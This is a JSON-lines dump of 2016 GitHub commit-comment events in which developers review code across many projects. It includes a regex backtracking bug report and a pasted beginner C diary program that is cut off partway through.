{"id":"4555934628","type":"CommitCommentEvent","actor":{"login":"Alexxz"},"repo":{"name":"expobrain/GitPython"},"payload":{"comment":{"id":19002348,"position":56,"line":576,"path":"git/util.py","commit_id":"547e6f0e2e9ace80e6d6b08db3c15fe91efe880f","created_at":"2016-09-13T14:26:21Z","updated_at":"2016-09-13T14:26:21Z","body":"If you add O_CREAT here you can remove # Create lock file section from above"}},"created_at":"2016-09-13T14:26:21Z"}
{"id":"4555934790","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19002349,"position":30,"line":29,"path":"Unit One/src/com/bayviewglen/daytwo/Sudoko.java","commit_id":"5dfedc9ad477626b6c84858accc16c131bd49f99","created_at":"2016-09-13T14:26:22Z","updated_at":"2016-09-13T14:26:22Z","body":"lazy"}},"created_at":"2016-09-13T14:26:22Z"}
{"id":"4555938012","type":"CommitCommentEvent","actor":{"login":"akbarjoudi"},"repo":{"name":"arswarog/yii2-bot-telegram"},"payload":{"comment":{"id":19002353,"position":null,"line":null,"path":null,"commit_id":"2f473bf53e69657e5b609350ef94595d75d1aead","created_at":"2016-09-13T14:26:50Z","updated_at":"2016-09-13T14:26:50Z","body":"Json encode for reply markup"}},"created_at":"2016-09-13T14:26:50Z"}
{"id":"4555940441","type":"CommitCommentEvent","actor":{"login":"funshodavid"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19002358,"position":30,"line":30,"path":"nuxeo-core/nuxeo-core-query/src/main/java/org/nuxeo/ecm/platform/query/api/QuickFilterDefinition.java","commit_id":"cc9683727b9f82f2dfa0d49fba30168e258f5a77","created_at":"2016-09-13T14:27:14Z","updated_at":"2016-09-13T14:27:14Z","body":"I thought it was a convention : every descriptor interface have the suffix \"Definition\""}},"created_at":"2016-09-13T14:27:14Z"}
{"id":"4555947289","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002370,"position":8,"line":232,"path":"src/utils/linearAlg2D.h","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-13T14:28:13Z","updated_at":"2016-09-13T14:28:13Z","body":"And if no point meets the criteria?"}},"created_at":"2016-09-13T14:28:13Z"}
{"id":"4555948839","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19002377,"position":30,"line":30,"path":"nuxeo-core/nuxeo-core-query/src/main/java/org/nuxeo/ecm/platform/query/api/QuickFilterDefinition.java","commit_id":"cc9683727b9f82f2dfa0d49fba30168e258f5a77","created_at":"2016-09-13T14:28:25Z","updated_at":"2016-09-13T14:28:25Z","body":"No, we don't have such a convention. We even very often don't use interfaces at all for descriptors."}},"created_at":"2016-09-13T14:28:25Z"}
{"id":"4555951599","type":"CommitCommentEvent","actor":{"login":"Alexxz"},"repo":{"name":"expobrain/GitPython"},"payload":{"comment":{"id":19002388,"position":56,"line":576,"path":"git/util.py","commit_id":"547e6f0e2e9ace80e6d6b08db3c15fe91efe880f","created_at":"2016-09-13T14:28:49Z","updated_at":"2016-09-13T14:28:49Z","body":"If you add os.O_CREAT to this open, you don't need '# Create lock file' block above"}},"created_at":"2016-09-13T14:28:49Z"}
{"id":"4555952590","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/homework_8"},"payload":{"comment":{"id":19002393,"position":39,"line":39,"path":"register.html","commit_id":"113103386d6b92b400c81571f9da5edaefc71cd7","created_at":"2016-09-13T14:28:59Z","updated_at":"2016-09-13T14:28:59Z","body":"Try not to use br tags. Play around with some combination of float, clear, and display block. "}},"created_at":"2016-09-13T14:28:59Z"}
{"id":"4555957826","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19002403,"position":null,"line":null,"path":null,"commit_id":"bccd75094fd5108b3d834ad3a86e056eed3b0337","created_at":"2016-09-13T14:29:45Z","updated_at":"2016-09-13T14:29:45Z","body":"It doesn't fix all occurrences. For example, evaluation of `wireshark-gtk` is broken now, and there may be other silent breakages (it's not common to have an assertion on this)."}},"created_at":"2016-09-13T14:29:45Z"}
{"id":"4555957999","type":"CommitCommentEvent","actor":{"login":"dimuravyev"},"repo":{"name":"travaler/test-rgk-junior"},"payload":{"comment":{"id":19002405,"position":1,"line":110,"path":"controllers/SiteController.php","commit_id":"8aa0f13d3d870b9b8d68a3878147ade2f6a6ffbc","created_at":"2016-09-13T14:29:47Z","updated_at":"2016-09-13T14:29:47Z","body":"тут надо убрать многоэтажность if. "}},"created_at":"2016-09-13T14:29:47Z"}
{"id":"4555958233","type":"CommitCommentEvent","actor":{"login":"wangyouquan"},"repo":{"name":"wangyouquan/MT"},"payload":{"comment":{"id":19002406,"position":5,"line":8,"path":"main/java/com/test/HelloWorld.java","commit_id":"b57c58ca7f29c106a36d271b8e406ba625617415","created_at":"2016-09-13T14:29:49Z","updated_at":"2016-09-13T14:29:49Z","body":"123"}},"created_at":"2016-09-13T14:29:49Z"}
{"id":"4555958461","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"prometheus/snmp_exporter"},"payload":{"comment":{"id":19002407,"position":69,"line":347,"path":"main.go","commit_id":"fb67884e0462b912cf5500ed17814eff60056641","created_at":"2016-09-13T14:29:51Z","updated_at":"2016-09-13T14:29:51Z","body":"Not really, there's only two cases are both are really obvious what's going on."}},"created_at":"2016-09-13T14:29:51Z"}
{"id":"4555959065","type":"CommitCommentEvent","actor":{"login":"audiohacked"},"repo":{"name":"facefunk/OpenCorsairLink"},"payload":{"comment":{"id":19002409,"position":null,"line":null,"path":null,"commit_id":"a75e13d51fae6ba42172a3ca29395636754bc997","created_at":"2016-09-13T14:29:57Z","updated_at":"2016-09-13T14:29:57Z","body":"If this works, then I would love it if you would do a pull request on this patch!"}},"created_at":"2016-09-13T14:29:57Z"}
{"id":"4555959581","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19002410,"position":null,"line":null,"path":null,"commit_id":"930660161030de6f4280a08bb14d53fdf0a67468","created_at":"2016-09-13T14:30:02Z","updated_at":"2016-09-13T14:30:02Z","body":"Reverting since it broke int02.openmrs.org:8080/openmrs. It was probably due to schema changes in metadatamapping 1.2.0-SNAPSHOT. The db on int02 will need to be recreated."}},"created_at":"2016-09-13T14:30:02Z"}
{"id":"4555959740","type":"CommitCommentEvent","actor":{"login":"gmpreussner"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":19002411,"position":null,"line":null,"path":null,"commit_id":"c220ddc927d1a97f72a0c5bf86de56301e3483ad","created_at":"2016-09-13T14:30:03Z","updated_at":"2016-09-13T14:30:03Z","body":"I understand your motivation, but I it's a bad idea to call SetDefaultDllDirectories from a library, because it affects the host application and all other dependencies. The host application should decide on its security requirements, which is why I suggest that you move this call from vlccore into VLC. It is sufficient for vlccore to play nicely with security enhanced applications by using LoadLibraryEx, but it must not enforce certain security policies on the application.\r\n\r\nEven if the host application can be modified to become compatible with your change, it cannot generally be done for other libraries that the application (or its plug-ins) depends on. The vast majority of available libraries has not been updated (or written with consideration) to use the LoadLibraryEx introduced in Vista."}},"created_at":"2016-09-13T14:30:03Z"}
{"id":"4555960558","type":"CommitCommentEvent","actor":{"login":"SeoFood"},"repo":{"name":"JosephSilber/bouncer"},"payload":{"comment":{"id":19002415,"position":null,"line":null,"path":null,"commit_id":"492982c40c6e7df88dc084872c3a99ee3acfcfe4","created_at":"2016-09-13T14:30:12Z","updated_at":"2016-09-13T14:30:12Z","body":"Sure.\r\n\r\nFor Example I want to create a notification for every user with a ability specific ability.\r\n\r\n```php\r\nforeach ($this->userRepository->can('my-ability') as $user) {\r\n    $notification = [\r\n        'user_id' => $user->id,\r\n        'title'   => 'My Title',\r\n        'message' => 'My Message',\r\n        'url'     => url('myUrl')\r\n    ];\r\n\r\n    $this->notificationRepository->create($notification);\r\n}\r\n```\r\n\r\nMy Repository:\r\n\r\n```php\r\n/**\r\n * @param $ability\r\n *\r\n * @return \\Illuminate\\Database\\Eloquent\\Collection\r\n */\r\npublic function can($ability)\r\n{\r\n    return $this->model->whereCan($ability)->get();\r\n}\r\n```"}},"created_at":"2016-09-13T14:30:12Z"}
{"id":"4555961907","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/homework_8"},"payload":{"comment":{"id":19002416,"position":109,"line":109,"path":"register.html","commit_id":"113103386d6b92b400c81571f9da5edaefc71cd7","created_at":"2016-09-13T14:30:24Z","updated_at":"2016-09-13T14:30:24Z","body":"It would be better if these spans were labels because then they would select the appropriate radio button. "}},"created_at":"2016-09-13T14:30:24Z"}
{"id":"4555964626","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/homework_8"},"payload":{"comment":{"id":19002421,"position":119,"line":119,"path":"register.html","commit_id":"113103386d6b92b400c81571f9da5edaefc71cd7","created_at":"2016-09-13T14:30:48Z","updated_at":"2016-09-13T14:30:48Z","body":"It'd be nice if this were also a label. "}},"created_at":"2016-09-13T14:30:48Z"}
{"id":"4555969896","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/homework_8"},"payload":{"comment":{"id":19002436,"position":null,"line":null,"path":null,"commit_id":"113103386d6b92b400c81571f9da5edaefc71cd7","created_at":"2016-09-13T14:31:37Z","updated_at":"2016-09-13T14:31:37Z","body":"Great work! That's a good looking form you've got there. "}},"created_at":"2016-09-13T14:31:37Z"}
{"id":"4555970660","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19002438,"position":null,"line":null,"path":null,"commit_id":"c24e1f8d6502845912d13c7d4df1647a967b2454","created_at":"2016-09-13T14:31:44Z","updated_at":"2016-09-13T14:31:44Z","body":"Reverted the last commit because one file was wrongly removed ( index.php )"}},"created_at":"2016-09-13T14:31:44Z"}
{"id":"4555972120","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19002441,"position":61,"line":253,"path":"Sources/DataManager.swift","commit_id":"ed8be26028589e47ece28b89608143dd2d47ba60","created_at":"2016-09-13T14:31:56Z","updated_at":"2016-09-13T14:31:56Z","body":"This should be changed to:\r\n\r\n```\r\nlet request = NSFetchRequest<T>()\r\n```\r\n\r\nIt's just passing along the generic type to the generic type of the fetch request. That way, you don't have to perform an unnecessary cast."}},"created_at":"2016-09-13T14:31:56Z"}
{"id":"4555972231","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":19002442,"position":null,"line":null,"path":null,"commit_id":"48f073985dc9e5d1c54036d7f7c6b0fb0b342065","created_at":"2016-09-13T14:31:57Z","updated_at":"2016-09-13T14:31:57Z","body":"зачем ставить @GeneratedValue ? Она необходима? Аннотации @Id не достаточно? "}},"created_at":"2016-09-13T14:31:57Z"}
{"id":"4555974785","type":"CommitCommentEvent","actor":{"login":"joakime"},"repo":{"name":"GoogleCloudPlatform/getting-started-java"},"payload":{"comment":{"id":19002451,"position":34,"line":76,"path":"helloworld-jsp/pom.xml","commit_id":"1cae0c439040430a46e50253a5b0ff628381c79e","created_at":"2016-09-13T14:32:22Z","updated_at":"2016-09-13T14:32:22Z","body":"this is an invalid pom.xml (extra `</plugins>` in wrong place)"}},"created_at":"2016-09-13T14:32:22Z"}
{"id":"4555978659","type":"CommitCommentEvent","actor":{"login":"trisholchendke"},"repo":{"name":"trisholchendke/GKSSPORTS5"},"payload":{"comment":{"id":19002460,"position":null,"line":null,"path":null,"commit_id":"86bd25603d649ee0dde6c79a65900dff4c022ca9","created_at":"2016-09-13T14:32:54Z","updated_at":"2016-09-13T14:32:54Z","body":"WWW"}},"created_at":"2016-09-13T14:32:54Z"}
{"id":"4555979059","type":"CommitCommentEvent","actor":{"login":"funshodavid"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19002461,"position":30,"line":30,"path":"nuxeo-core/nuxeo-core-query/src/main/java/org/nuxeo/ecm/platform/query/api/QuickFilterDefinition.java","commit_id":"cc9683727b9f82f2dfa0d49fba30168e258f5a77","created_at":"2016-09-13T14:32:58Z","updated_at":"2016-09-13T14:32:58Z","body":"Ok, it was at least the case in the package nuxeo-core-query. I'll make the changes"}},"created_at":"2016-09-13T14:32:58Z"}
{"id":"4555981034","type":"CommitCommentEvent","actor":{"login":"pleonex"},"repo":{"name":"pleonex/atom-autocomplete-xml"},"payload":{"comment":{"id":19002463,"position":null,"line":null,"path":null,"commit_id":"cadb439fb5ff90f13fe9df5492972dace56c728f","created_at":"2016-09-13T14:33:17Z","updated_at":"2016-09-13T14:33:17Z","body":"Wrong commit message: this fixes #23"}},"created_at":"2016-09-13T14:33:17Z"}
{"id":"4555981642","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002465,"position":20,"line":42,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-13T14:33:23Z","updated_at":"2016-09-13T14:33:23Z","body":"Don't really need that intermediary `dott` variable here, do we? I was going to complain about it's variable name...\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-13T14:33:23Z"}
{"id":"4555981896","type":"CommitCommentEvent","actor":{"login":"anakornk"},"repo":{"name":"anakornk/Get-Instagram-ID-From-Username-PHP"},"payload":{"comment":{"id":19002467,"position":null,"line":null,"path":null,"commit_id":"03ab2f94300d19cea5d5ad5e8578aaf056f5aac8","created_at":"2016-09-13T14:33:25Z","updated_at":"2016-09-13T14:33:25Z","body":"<img width=\"690\" alt=\"getigid\" src=\"https://cloud.githubusercontent.com/assets/8156002/18477949/0f3d0cb6-7a02-11e6-87fa-b447df3f947c.png\">\r\n<img width=\"502\" alt=\"usage\" src=\"https://cloud.githubusercontent.com/assets/8156002/18477950/0f5208b4-7a02-11e6-9220-85cf4dd33c85.png\">\r\n"}},"created_at":"2016-09-13T14:33:25Z"}
{"id":"4555985448","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19002478,"position":10,"line":29,"path":"src/main/scala/mesosphere/marathon/api/MarathonExceptionMapper.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T14:33:56Z","updated_at":"2016-09-13T14:33:56Z","body":"Right. Oops"}},"created_at":"2016-09-13T14:33:56Z"}
{"id":"4555986227","type":"CommitCommentEvent","actor":{"login":"suprememoocow"},"repo":{"name":"gitterHQ/marked"},"payload":{"comment":{"id":19002480,"position":5,"line":490,"path":"lib/marked.js","commit_id":"3932e77c21545790f85ceef6c0f135c87bf2c119","created_at":"2016-09-13T14:34:04Z","updated_at":"2016-09-13T14:34:04Z","body":"😢  This change has introduced a catastrophic backtracking failure into the system:\r\n\r\n\r\nTry this in your devtools:\r\n```js\r\nt = performance.now(); /\\b((?:https?:\\/\\/|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}\\/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))(?:&quot;|\\s|$)/.test('foo (www.bar.org/bazquxpl/gar-1.2.ply)]'); console.log('took ', performance.now() - t, 'ms')\r\n2016-09-13 15:31:48.458 VM613:1 took  3246.7649999998976 ms\r\n```\r\n\r\nvs. the old version:\r\n\r\n```js\r\nt = performance.now();  /\\b((?:https?:\\/\\/|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}\\/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))/.test('foo (www.bar.org/bazquxpl/gar-1.2.ply)]'); console.log('took ', performance.now() - t, 'ms')\r\nt = performance.now();  /\\b((?:https?:\\/\\/|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}\\/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))/.test('foo (www.bar.org/bazquxpl/gar-1.2.ply)]'); console.log('took ', performance.now() - t, 'ms')\r\n2016-09-13 15:33:25.937 VM616:1 took  0.16499999992083758 ms\r\n```\r\n\r\ncc @MadLittleMods "}},"created_at":"2016-09-13T14:34:04Z"}
{"id":"4555988775","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19002488,"position":null,"line":null,"path":null,"commit_id":"720cbbfb1b246ea4499067a7096b1e3ed0b4ba1f","created_at":"2016-09-13T14:34:29Z","updated_at":"2016-09-13T14:34:29Z","body":"To make the labels bold, you have used `<b>` tag; use `<strong>` instead.\r\n\r\nRead this to find the difference: http://stackoverflow.com/questions/271743/whats-the-difference-between-b-and-strong-i-and-em"}},"created_at":"2016-09-13T14:34:29Z"}
{"id":"4555991344","type":"CommitCommentEvent","actor":{"login":"Jeremy-Barnes"},"repo":{"name":"Jeremy-Barnes/Critters"},"payload":{"comment":{"id":19002499,"position":null,"line":null,"path":null,"commit_id":"4b9de43fa3a9fc1d1846518ab17f87d1ef34d96f","created_at":"2016-09-13T14:34:52Z","updated_at":"2016-09-13T14:34:52Z","body":"Hmm. `instanceof` might work?\r\n\r\nIt [does look like ](https://groups.google.com/forum/#!topic/google-web-toolkit/fCY7AQHLDrQ)the `isAssignableFrom` method isn't supported by GWT (the toolkit used by libGDX to make Java -> JS)\r\n\r\n"}},"created_at":"2016-09-13T14:34:52Z"}
{"id":"4555992480","type":"CommitCommentEvent","actor":{"login":"nhowell"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19002503,"position":null,"line":null,"path":null,"commit_id":"9c0278274bcaa7370a9810c4e7d6f791c1d6146d","created_at":"2016-09-13T14:35:00Z","updated_at":"2016-09-13T14:35:00Z","body":"I'm curious... why not grab the CSRF token from the `<meta>` tag instead of using this `Laravel.csrfToken` global variable?\r\n```\r\n$('meta[name=\"csrf-token\"]').attr('content')\r\n```"}},"created_at":"2016-09-13T14:35:00Z"}
{"id":"4555993152","type":"CommitCommentEvent","actor":{"login":"pyj927"},"repo":{"name":"th6366/HurabonoProject"},"payload":{"comment":{"id":19002507,"position":null,"line":null,"path":null,"commit_id":"48d45a740102ca3837c68c58669e95f6bc031713","created_at":"2016-09-13T14:35:11Z","updated_at":"2016-09-13T14:35:11Z","body":"안녕하세요 조원 박윤정입니다. 한학기동안 팀원분들과 열심히 프로젝트를 만들고 싶습니다!"}},"created_at":"2016-09-13T14:35:11Z"}
{"id":"4555994791","type":"CommitCommentEvent","actor":{"login":"chiester"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19002509,"position":12,"line":95,"path":"docs/docs/10.1-animation.md","commit_id":"f17a15a07d856c8f2c805512887b929c03071874","created_at":"2016-09-13T14:35:22Z","updated_at":"2016-09-13T14:35:22Z","body":"Does this <h1> not require a 'key' attribute, based on the previous statement that all children of ReactCSSTransitionGroup require a 'key' attribute, even if there is only one child element?"}},"created_at":"2016-09-13T14:35:22Z"}
{"id":"4555994852","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19002510,"position":12,"line":14,"path":"src/main/scala/mesosphere/marathon/api/PublicServlet.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T14:35:23Z","updated_at":"2016-09-13T14:35:23Z","body":"Statement had no effect?"}},"created_at":"2016-09-13T14:35:23Z"}
{"id":"4555995446","type":"CommitCommentEvent","actor":{"login":"raphael-boucher"},"repo":{"name":"Polyconseil/systematic"},"payload":{"comment":{"id":19002513,"position":4,"line":160,"path":"mk/main.mk","commit_id":"37bb318d7715f4ee79e78fb91e6d9352a747a533","created_at":"2016-09-13T14:35:28Z","updated_at":"2016-09-13T14:35:28Z","body":"Oh right, it's even the case with \"source-map\" on my setup.\r\nI was so used to the bad stack trace that I did not really understood what was going on."}},"created_at":"2016-09-13T14:35:28Z"}
{"id":"4555996117","type":"CommitCommentEvent","actor":{"login":"Vinaysv12"},"repo":{"name":"Vinaysv12/vinay"},"payload":{"comment":{"id":19002518,"position":null,"line":null,"path":null,"commit_id":"84cd9682e6a812368f2f955f9145838bce344b1f","created_at":"2016-09-13T14:35:34Z","updated_at":"2016-09-13T14:35:34Z","body":"#include<stdio.h>\r\n\r\n#include<stdlib.h>\r\n\r\n#include<conio.h>\r\n\r\n#include<string.h>\r\n\r\n\r\nint password();\r\n\r\nvoid addrecord();\r\n\r\nvoid viewrecord();\r\n\r\nvoid editrecord();\r\n\r\nvoid editpassword();\r\n\r\nvoid deleterecord();\r\n\r\n\r\nstruct record\r\n\r\n{\r\n\r\n    char time[6];\r\n\r\n    char name[30];\r\n\r\n    char place[25];\r\n\r\n    char duration[10];\r\n\r\n    char note[500];\r\n\r\n} ;\r\n\r\n\r\nint main()\r\n\r\n{\r\n\r\n    int ch;\r\n\r\n    printf(\"\\n\\n\\t***********************************\\n\");\r\n\r\n    printf(\"\\t*PASSWORD PROTECTED PERSONAL DIARY*\\n\");\r\n\r\n    printf(\"\\t***********************************\");\r\n\r\n\r\n   while(1)\r\n\r\n\r\n        {\r\n\r\n                printf(\"\\n\\n\\t\\tMAIN MENU:\");\r\n\r\n                printf(\"\\n\\n\\tADD RECORD\\t[1]\");\r\n\r\n                printf(\"\\n\\tVIEW RECORD\\t[2]\");\r\n\r\n                printf(\"\\n\\tEDIT RECORD\\t[3]\");\r\n\r\n                printf(\"\\n\\tDELETE RECORD\\t[4]\");\r\n\r\n                printf(\"\\n\\tEDIT PASSWORD\\t[5]\");\r\n\r\n                printf(\"\\n\\tEXIT\\t\\t[6]\");\r\n\r\n                printf(\"\\n\\n\\tENTER YOUR CHOICE:\");\r\n\r\n                scanf(\"%d\",&ch);\r\n\r\n\r\n            switch(ch)\r\n\r\n                    {\r\n\r\n                            case 1:\r\n\r\n                            addrecord();\r\n\r\n                            break;\r\n\r\n\r\n                            case 2:\r\n\r\n                            viewrecord();\r\n\r\n                            break;\r\n\r\n\r\n                            case 3:\r\n\r\n                            editrecord();\r\n\r\n                            break;\r\n\r\n\r\n                            case 4:\r\n\r\n                            deleterecord();\r\n\r\n                            break;\r\n\r\n\r\n                            case 5:\r\n\r\n                            editpassword();\r\n\r\n                            break;\r\n\r\n\r\n                            case 6:\r\n\r\n                            printf(\"\\n\\n\\t\\tTHANK YOU FOR USING THE SOFTWARE BY:\\n\\n\\tBIJAY PURI\\n\\n\\tBHANU POUDEL\\n\\n\\tNRIPASH AYER...\");\r\n\r\n                            getch();\r\n\r\n                            exit(0);\r\n\r\n\r\n                            default:\r\n\r\n                            printf(\"\\nYOU ENTERED WRONG CHOICE..\");\r\n\r\n                            printf(\"\\nPRESS ANY KEY TO TRY AGAIN\");\r\n\r\n                            getch();\r\n\r\n                            break;\r\n\r\n                    }\r\n\r\n                system(\"cls\");\r\n\r\n        }\r\n\r\n            return 0;\r\n\r\n}\r\n\r\nvoid addrecord( )\r\n\r\n{\r\n\r\n                system(\"cls\");\r\n\r\n                FILE *fp ;\r\n\r\n                char another = 'Y' ,time[10];\r\n\r\n                struct record e ;\r\n\r\n                char filename[15];\r\n\r\n                int choice;\r\n\r\n                printf(\"\\n\\n\\t\\t***************************\\n\");\r\n\r\n                printf(\"\\t\\t* WELCOME TO THE ADD MENU *\");\r\n\r\n                printf(\"\\n\\t\\t***************************\\n\\n\");\r\n\r\n                printf(\"\\n\\n\\tENTER DATE OF YOUR RECORD:[yyyy-mm-dd]:\");\r\n\r\n                fflush(stdin);\r\n\r\n                gets(filename);\r\n\r\n                fp = fopen (filename, \"ab+\" ) ;\r\n\r\n                if ( fp == NULL )\r\n\r\n                {\r\n\r\n                fp=fopen(filename,\"wb+\");\r\n\r\n                if(fp==NULL)\r\n\r\n                {\r\n\r\n                    printf(\"\\nSYSTEM ERROR...\");\r\n\r\n                    printf(\"\\nPRESS ANY KEY TO EXIT\");\r\n\r\n                    getch();\r\n\r\n                    return ;\r\n\r\n                }\r\n\r\n                }\r\n\r\n\r\n\r\n                while ( another == 'Y'|| another=='y' )\r\n\r\n                {\r\n\r\n                    choice=0;\r\n\r\n                    fflush(stdin);\r\n\r\n                printf ( \"\\n\\tENTER TIME:[hh:mm]:\");\r\n\r\n                scanf(\"%s\",time);\r\n\r\n                rewind(fp);\r\n\r\n                while(fread(&e,sizeof(e),1,fp)==1)\r\n\r\n                {\r\n\r\n                    if(strcmp(e.time,time)==0)\r\n\r\n                    {\r\n\r\n                        printf(\"\\n\\tTHE RECORD ALREADY EXISTS.\\n\");\r\n\r\n                        choice=1;\r\n\r\n                    }\r\n\r\n                }\r\n\r\n                    if(choice==0)\r\n\r\n                    {\r\n\r\n                        strcpy(e.time,time);\r\n\r\n                        printf(\"\\tENTER NAME:\");\r\n\r\n                        fflush(stdin);\r\n\r\n                        gets(e.name);\r\n\r\n                        fflush(stdin);\r\n\r\n                        printf(\"\\tENTER PLACE:\");\r\n\r\n                        gets(e.place);\r\n\r\n                        fflush(stdin);\r\n\r\n                        printf(\"\\tENTER DURATION:\");\r\n\r\n                        gets(e.duration);\r\n\r\n                        fflush(stdin);\r\n\r\n                        printf(\"\\tNOTE:\");\r\n\r\n                        gets(e.note);\r\n\r\n                        fwrite ( &e, sizeof ( e ), 1, fp ) ;\r\n\r\n                        printf(\"\\nYOUR RECORD IS ADDED...\\n\");\r\n\r\n                    }\r\n\r\n                        printf ( \"\\n\\tADD ANOTHER RECORD...(Y/N) \" ) ;\r\n\r\n                        fflush ( stdin ) ;\r\n\r\n                        another = getchar( ) ;\r\n\r\n                }\r\n\r\n\r\n                fclose ( fp ) ;\r\n\r\n                printf(\"\\n\\n\\tPRESS ANY KEY TO EXIT...\");\r\n\r\n                getch();\r\n\r\n    }\r\n\r\n\r\nvoid viewrecord( )\r\n\r\n{\r\n\r\n        FILE *fpte ;\r\n\r\n        system(\"cls\");\r\n\r\n        struct record customer ;\r\n\r\n        char time[6],choice,filename[14];\r\n\r\n        int ch;\r\n\r\n        printf(\"\\n\\n\\t\\t*******************************\\n\");\r\n\r\n        printf(\"\\t\\t* HERE IS THE VIEWING MENU *\");\r\n\r\n        printf(\"\\n\\t\\t*******************************\\n\\n\");\r\n\r\n        choice=password();\r\n\r\n        if(choice!=0)\r\n\r\n            {\r\n\r\n                return ;\r\n\r\n            }\r\n\r\n        do\r\n\r\n            {\r\n\r\n                    printf(\"\\n\\tENTER THE DATE OF RECORD TO BE VIEWED:[yyyy-mm-dd]:\");\r\n\r\n                    fflush(stdin);\r\n\r\n                    gets(filename);\r\n\r\n\r\n                    fpte = fopen ( filename, \"rb\" ) ;\r\n\r\n                    if ( fpte == NULL )\r\n\r\n                            {\r\n\r\n                                puts ( \"\\nTHE RECORD DOES NOT EXIST...\\n\" ) ;\r\n\r\n                                printf(\"PRESS ANY KEY TO EXIT...\");\r\n\r\n                                getch();\r\n\r\n                                return ;\r\n\r\n                            }\r\n\r\n                            system(\"cls\");\r\n\r\n                printf(\"\\n\\tHOW WOULD YOU LIKE TO VIEW:\\n\");\r\n\r\n                printf(\"\\n\\t1.WHOLE RECORD OF THE DAY.\");\r\n\r\n                printf(\"\\n\\t2.RECORD OF FIX TIME.\");\r\n\r\n                printf(\"\\n\\t\\tENTER YOUR CHOICE:\");\r\n\r\n                scanf(\"%d\",&ch);\r\n\r\n                switch(ch)\r\n\r\n                {\r\n\r\n                    case 1:\r\n\r\n                            printf(\"\\nTHE WHOLE RECORD FOR %s IS:\",filename);\r\n\r\n                         while ( fread ( &customer, sizeof ( customer ), 1, fpte ) == 1 )\r\n\r\n                         {\r\n\r\n                            printf(\"\\n\");\r\n\r\n                            printf(\"\\nTIME: %s\",customer.time);\r\n\r\n                            printf(\"\\nMEETING WITH: %s\",customer.name);\r\n\r\n                            printf(\"\\nMEETING AT: %s\",customer.place);\r\n\r\n                            printf(\"\\nDURATION: %s\",customer.duration);\r\n\r\n                            printf(\"\\nNOTE: %s\",customer.note);\r\n\r\n                            printf(\"\\n\");\r\n\r\n                         }\r\n\r\n                         break;\r\n\r\n\r\n                    case 2:\r\n\r\n                            fflush(stdin);\r\n\r\n                            printf(\"\\nENTER TIME:[hh:mm]:\");\r\n\r\n                            gets(time);\r\n\r\n                            while ( fread ( &customer, sizeof ( customer ), 1, fpte ) == 1 )\r\n\r\n\r\n                            {\r\n\r\n                                if(strcmp(customer.time,time)==0)\r\n\r\n                                {\r\n\r\n                                    printf(\"\\nYOUR RECORD IS:\");\r\n\r\n                                    printf(\"\\nTIME: %s\",customer.time);\r\n\r\n                                    printf(\"\\nMEETING WITH: %s\",customer.name);\r\n\r\n                                    printf(\"\\nMEETING AT: %s\",customer.place);\r\n\r\n                                    printf(\"\\nDUARATION: %s\",customer.duration);\r\n\r\n                                    printf(\"\\nNOTE: %s\",customer.note);\r\n\r\n                                }\r\n\r\n                            }\r\n\r\n                            break;\r\n\r\n\r\n                    default: printf(\"\\nYOU 